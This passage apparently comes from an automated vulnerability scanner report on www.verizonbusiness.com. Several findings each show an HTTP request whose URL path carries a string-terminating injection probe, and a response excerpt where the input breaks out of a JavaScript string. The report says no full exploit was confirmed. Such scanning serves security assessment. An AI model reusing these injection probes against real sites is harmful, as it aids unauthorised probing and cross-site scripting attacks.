<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsd271a";4ce5826d283/byneed/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBM
...[SNIP]...

1.882. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bc9a8'%3b1f82b645b2a was submitted in the REST URL parameter 1. This input was echoed as bc9a8';1f82b645b2a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsbc9a8'%3b1f82b645b2a/byneed/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:01 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40632
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:01 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:01 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutionsbc9a8';1f82b645b2a/byneed/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.883. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a31e"%3bafd3cb154f3 was submitted in the REST URL parameter 2. This input was echoed as 4a31e";afd3cb154f3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed4a31e"%3bafd3cb154f3/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:08 GMT
Content-Type: text/html
Content-Length: 41844
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:08 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:08 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed4a31e";afd3cb154f3/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.884. http://www.verizonbusiness.com/solutions/byneed/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload df793'%3b029ff1e7e97 was submitted in the REST URL parameter 2. This input was echoed as df793';029ff1e7e97 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneeddf793'%3b029ff1e7e97/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:14 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41844
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:14 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:14 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link hre
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneeddf793';029ff1e7e97/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.885. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bead7"%3b82c8577c6a1 was submitted in the REST URL parameter 1. This input was echoed as bead7";82c8577c6a1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutionsbead7"%3b82c8577c6a1/byneed/agility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:23 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40648
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:23 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:23 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutionsbead7";82c8577c6a1/byneed/agility/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS
...[SNIP]...

1.886. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4eb40'%3b53d34285cd7 was submitted in the REST URL parameter 1. This input was echoed as 4eb40';53d34285cd7 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions4eb40'%3b53d34285cd7/byneed/agility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:30 GMT
Content-Type: text/html
Content-Length: 40650
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:30 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:30 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions4eb40';53d34285cd7/byneed/agility/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.887. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58b9c'%3b29abc4185c4 was submitted in the REST URL parameter 2. This input was echoed as 58b9c';29abc4185c4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed58b9c'%3b29abc4185c4/agility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:45 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41862
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:45 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:45 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link type="text/css" rel="stylesheet" href="/(15:46:12)/templates/vzbar/style.css"><link typ
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed58b9c';29abc4185c4/agility/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.888. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b8ea"%3ba4fd2bf2f2f was submitted in the REST URL parameter 2. This input was echoed as 5b8ea";a4fd2bf2f2f in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed5b8ea"%3ba4fd2bf2f2f/agility/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:37 GMT
Content-Type: text/html
Content-Length: 41862
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:37 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed5b8ea";a4fd2bf2f2f/agility/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUB
...[SNIP]...

1.889. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b903e'%3b56a8961dbbd was submitted in the REST URL parameter 3. This input was echoed as b903e';56a8961dbbd in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/agilityb903e'%3b56a8961dbbd/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:39:13 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41914
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:13 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:13 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions/byneed/agilityb903e';56a8961dbbd/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.890. http://www.verizonbusiness.com/solutions/byneed/agility/ [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/agility/

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15872"%3b8ce0ad004f1 was submitted in the REST URL parameter 3. This input was echoed as 15872";8ce0ad004f1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed/agility15872"%3b8ce0ad004f1/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Last-Modified: Wed, 17 Nov 2010 00:39:00 GMT
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 41914
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:39:00 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:39:00 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed/agility15872";8ce0ad004f1/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR SUBMIT FUNC
...[SNIP]...

1.891. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a2eb'%3b5f3bdd46a54 was submitted in the REST URL parameter 1. This input was echoed as 7a2eb';5f3bdd46a54 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions7a2eb'%3b5f3bdd46a54/byneed/performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Vary: User-Agent
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:25 GMT
Content-Type: text/html
Content-Length: 40658
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:26 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
<script type="text/javascript">
var request='/solutions7a2eb';5f3bdd46a54/byneed/performance/index.xml'.toLowerCase().replace(/_/,'/');
var rurl=request.split('/');
var s=new Array();
var i=0; if (rurl.length>
...[SNIP]...

1.892. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43f20"%3bf5eb99e09a9 was submitted in the REST URL parameter 1. This input was echoed as 43f20";f5eb99e09a9 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions43f20"%3bf5eb99e09a9/byneed/performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:15 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 40656
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:15 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:15 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" rel="stylesheet" type="text/css"><link hre
...[SNIP]...


} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions43f20";f5eb99e09a9/byneed/performance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEM
...[SNIP]...

1.893. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30022"%3ba70db30c06c was submitted in the REST URL parameter 2. This input was echoed as 30022";a70db30c06c in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed30022"%3ba70db30c06c/performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
Last-Modified: Wed, 17 Nov 2010 00:38:34 GMT
Vary: User-Agent
Content-Type: text/html
Content-Length: 41868
Vary: Accept-Encoding
Date: Wed, 17 Nov 2010 00:38:34 GMT
Connection: close
Expires: Mon, 16 Nov 2009 18:38:34 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html>

<head>
<link href="/(15:46:12)/templates/vzbar/style.css" type="text/css" rel="stylesheet"><link med
...[SNIP]...
} catch(e) {}

hbx.ci="";//CUSTOMER ID
hbx.hrf="";//CUSTOM REFERRER

hbx.pn="Page not found";//PAGE NAME(S)
hbx.mlc="CONTENT+CATEGORY";//MULTI-LEVEL CONTENT CATEGORY

hbx.mlc="/error/solutions/byneed30022";a70db30c06c/performance/index.xml";

hbx.pndef="title";//DEFAULT PAGE NAME
hbx.ctdef="full";//DEFAULT CONTENT CATEGORY

//OPTIONAL PAGE VARIABLES

//ACTION SETTINGS
hbx.fv="";//FORM VALIDATION MINIMUM ELEMENTS OR
...[SNIP]...

1.894. http://www.verizonbusiness.com/solutions/byneed/performance/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.verizonbusiness.com
Path:   /solutions/byneed/performance/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 22d58'%3b16f52457063 was submitted in the REST URL parameter 2. This input was echoed as 22d58';16f52457063 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /solutions/byneed22d58'%3b16f52457063/performance/ HTTP/1.1
Host: www.verizonbusiness.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; __utmz=58777642.1289951911.1.1.utmcsr=news.cnet.com|utmccn=(referral)|utmcmd=referral|utmcct=/8301-27080_3-20022451-245.html; __utma=58777642.1211968314.1289951911.1289951911.1289951911.1; CP=null*; __utmc=58777642; __utmb=58777642.1.10.1289951911;

Response

HTTP/1.1 404 Not Found
Server: Roxen/4.5.146-release3
Accept-Ranges: bytes
